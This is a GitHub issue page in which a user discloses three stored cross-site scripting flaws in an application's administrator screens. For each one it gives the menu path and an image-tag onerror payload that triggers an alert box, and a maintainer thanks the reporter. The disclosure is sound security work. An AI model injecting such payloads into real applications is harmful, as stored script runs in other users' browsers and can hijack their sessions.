Skip to content
This repository has been archived by the owner. It is now read-only.

Multiple Stored Cross Site Scriping #186

Closed
hp-yang opened this issue May 5, 2017 · 1 comment

Comments

Projects
None yet
2 participants
@hp-yang
Copy link

commented May 5, 2017

(1) poc:login->menu->administrator->common data->add array(or change)->key(or value)
<img src="x" onerror="alert(1)">
->confirm
image
(2) poc:login->menu->administrator->currencies->new(or edit)->decimal sign->
<img src="x" onerror="alert(1)">
->save
image
(3) poc:login->menu->administrator->countries->add array(or change)->key(or value)
<img src="x" onerror="alert(1)">
->confirm
image

@NorbertNader

This comment has been minimized.

Copy link
Contributor

commented May 28, 2017

Thank you for your help @hp-yang, we appreciate it.

Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
You can’t perform that action at this time.